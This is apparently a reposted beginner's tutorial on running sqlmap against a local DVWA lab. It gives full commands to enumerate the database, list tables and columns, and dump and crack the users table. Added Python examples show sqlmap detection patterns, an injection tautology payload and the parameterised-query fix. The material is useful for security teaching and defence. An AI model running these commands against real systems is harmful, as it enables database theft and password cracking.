SQL injection with sqlmap: beginner's notes (DVWA test environment)

Install sqlmap and add its directory to the PATH environment variable.

First, locate the injection point: http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit

Then open cmd and enter:

sqlmap.py -u "http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" -b --current-db --current-user

This command fetches the DBMS banner (-b), the current database name and the current user. If it cannot retrieve them, add the following parameter:

--cookie="security=low; PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5"

The full command is then:

sqlmap.py -u "http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -b --current-db --current-user

You have to obtain the cookie yourself from the browser. Here is how to get it in the Edge browser bundled with Windows 10:

On the injection page, right-click > Inspect element > Network > select the entry with the matching name/path; the Cookie header is listed under Request Headers in the Headers pane on the right.

Data obtained:

[16:38:02] [INFO] the back-end DBMS is MySQL
[16:38:02] [INFO] fetching banner
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0
banner:    '5.6.12-log'
[16:38:02] [INFO] fetching current user
current user:    'root@localhost'
[16:38:02] [INFO] fetching current database
current database:    'dvwa'
[16:38:02] [INFO] fetched data logged to text files under 'C:\Users\denyy\.sqlmap\output\192.168.137.192'

[*] shutting down at 16:38:02
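A defender's counterpart to the run above, as an added example that is not part of the original post and not sqlmap code: a small Python checker that scans Apache combined-format access-log lines for requests that look like sqlmap probing the id parameter, using sqlmap's default User-Agent prefix and a few syntax fragments that a purely numeric id never contains. The log lines, the sqlmap version string, the keyword list and the length limit are constructed for the example, not captured from the lab described here.

```python
"""Flag sqlmap-style probing of DVWA's `id` parameter in Apache access logs.

Added example for this write-up; it is not code from the original post or from sqlmap.
Every log line, the sqlmap version string and the thresholds below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format:
#   ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters and keywords a legitimate numeric `id` never carries. The keyword list and
# the length limit are assumptions chosen for this example, not a complete signature set.
SQL_INDICATORS = re.compile(
    r"""(['"()]|--|#|/\*|\b(?:union|select|sleep|benchmark|and|or)\b)""", re.I
)
MAX_ID_LEN = 8


def parse_line(line):
    """Return the log fields as a dict, or None for lines that are not combined format."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def score_request(entry):
    """List the reasons a parsed request looks like injection probing (empty if clean)."""
    reasons = []
    # sqlmap announces itself as "sqlmap/<version> ..." unless told otherwise
    if entry["agent"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes each value once, which is enough for plain sqlmap payloads
    query = parse_qs(urlsplit(entry["path"]).query, keep_blank_values=True)
    for value in query.get("id", []):
        if value.isdigit():
            continue  # the only thing this parameter should ever hold
        if SQL_INDICATORS.search(value):
            reasons.append("sql syntax in id")
        if len(value) > MAX_ID_LEN:
            reasons.append("oversized id")
    return reasons


def flag_injection_attempts(lines):
    """Return (ip, path, reasons) for every parsable line that trips at least one check."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = score_request(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
    return hits


# Constructed sample: a normal visit, a sqlmap quote probe, a boolean probe sent with a
# browser agent, a long but purely numeric id, and one unparsable line.
SAMPLE_LOG = [
    '192.168.137.1 - - [22/Mar/2019:16:30:01 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4310 "-" "Mozilla/5.0 (Windows NT 10.0) Edge/18"',
    '192.168.137.1 - - [22/Mar/2019:16:38:02 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%27&Submit=Submit HTTP/1.1" 200 4310 "-" "sqlmap/1.3.3#stable (http://sqlmap.org)"',
    '192.168.137.1 - - [22/Mar/2019:16:38:02 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=2%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4310 "-" "Mozilla/5.0 (Windows NT 10.0) Edge/18"',
    '192.168.137.1 - - [22/Mar/2019:16:40:10 +0800] "GET /DVWA-1.9/vulnerabilities/sqli/?id=1234567890&Submit=Submit HTTP/1.1" 200 4310 "-" "Mozilla/5.0"',
    "not an access-log line at all",
]

if __name__ == "__main__":
    for ip, path, reasons in flag_injection_attempts(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
```

Two caveats for real logs: sqlmap's --random-agent option replaces the tell-tale User-Agent with a browser string, so the checks on the parameter value carry more weight than the agent check, and parse_qs decodes each value only once, so a double-encoded value would need an extra decoding pass before scoring.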

Next, retrieve the table names in the dvwa database.

Enter the following:

sqlmap.py -u "http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa --tables

The result:

[16:48:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0
[16:48:00] [INFO] fetching tables for database: 'dvwa'
[16:48:00] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Then retrieve the column names of the users table.

Enter the command:

sqlmap.py -u "http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa -T users --columns

The result:

Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

Then dump the values of the key columns; this step also cracks the password hashes.

Enter the following command:

sqlmap.py -u "http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=mg7hrjknbh6fi2jqlotuf3v9a5" -D dvwa -T users -C "user_id,user,password" --dump --batch

--dump retrieves the rows, attempts to crack the hashed passwords and writes the results to the default output path.

--batch answers every prompt with the default (recommended) choice; without it, the command above stops several times to ask Y/n questions, where the capitalised letter is the recommended answer.

The result:

Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------------------+
| user_id | user    | password                                    |
+---------+---------+---------------------------------------------+
| 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------+---------------------------------------------+

[16:56:55] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\XXXX\.sqlmap\output\192.168.137.192\dump\dvwa\users.csv'
[16:56:55] [INFO] fetched data logged to text files under 'C:\Users\XXXX\.sqlmap\output\192.168.137.192'

The file 'C:\Users\XXXX\.sqlmap\output\192.168.137.192\dump\dvwa\users.csv' is where the cracked passwords are saved.
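The root cause and the fix, as an added example that is neither DVWA's PHP source nor sqlmap output: a lookup that concatenates the id parameter into the SQL text (the shape that lets sqlmap enumerate the database; DVWA's real code is not shown in this post, so the query is an assumption) next to the parameterised version, plus a check showing that the password column in the dump above is plain unsalted MD5 and what a salted, slow hash record looks like instead. The sqlite3 in-memory table copies the column list sqlmap printed; the two rows are constructed using the admin and gordonb hash values from the dump, and the PBKDF2 record format is this example's own.

```python
"""Concatenated query beside its parameterised form, and a check for unsalted MD5.

Added example for this write-up; not DVWA's PHP source and not sqlmap code. The query
shape is an assumption about the vulnerable page; the table mirrors the column list
sqlmap printed, and the two rows are constructed using hash values from the dump.
"""
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """In-memory stand-in for dvwa.users, seeded with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, avatar TEXT, "
        "first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin.jpg", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
            (2, "gordonb", "gordonb.jpg", "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
        ],
    )
    return conn


def lookup_unsafe(conn, user_id):
    """Assumed vulnerable shape: the request parameter is pasted into the SQL text,
    so a value containing a quote changes the query instead of being compared."""
    sql = "SELECT user_id, user FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised form: the driver sends the value separately from the SQL text."""
    return conn.execute(
        "SELECT user_id, user FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def looks_like_unsalted_md5(plaintext, stored):
    """True when `stored` is exactly md5(plaintext), the scheme visible in the dump:
    two users with the same password share one hash, and a wordlist cracks it at once."""
    return len(stored) == 32 and hmac.compare_digest(
        hashlib.md5(plaintext.encode()).hexdigest(), stored.lower()
    )


def hash_password(plaintext, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256; the record layout 'pbkdf2$iterations$salt$digest' is
    this example's own format, not a library or DVWA convention."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", plaintext.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${digest.hex()}"


def verify_password(plaintext, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", plaintext.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    db = make_db()
    tautology = "2' OR '1'='1"  # one quote is all the concatenated query needs
    print("unsafe, normal input :", lookup_unsafe(db, "2"))
    print("unsafe, quoted input :", lookup_unsafe(db, tautology))  # every row
    print("safe, quoted input   :", lookup_safe(db, tautology))    # no row
    print("admin hash is md5('password'):",
          looks_like_unsalted_md5("password", "5f4dcc3b5aa765d61d8327deb882cf99"))
    print("same password, two different PBKDF2 records:",
          hash_password("password") != hash_password("password"))
```

The parameterised query is what stops sqlmap's enumeration: the bound value is compared as data, never parsed as SQL. The hashing change addresses the second finding in the dump, where admin and smithy share one MD5 value and every entry was cracked by a dictionary in the same run.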


Reproduced from blog.csdn.net/u011130086/article/details/88755939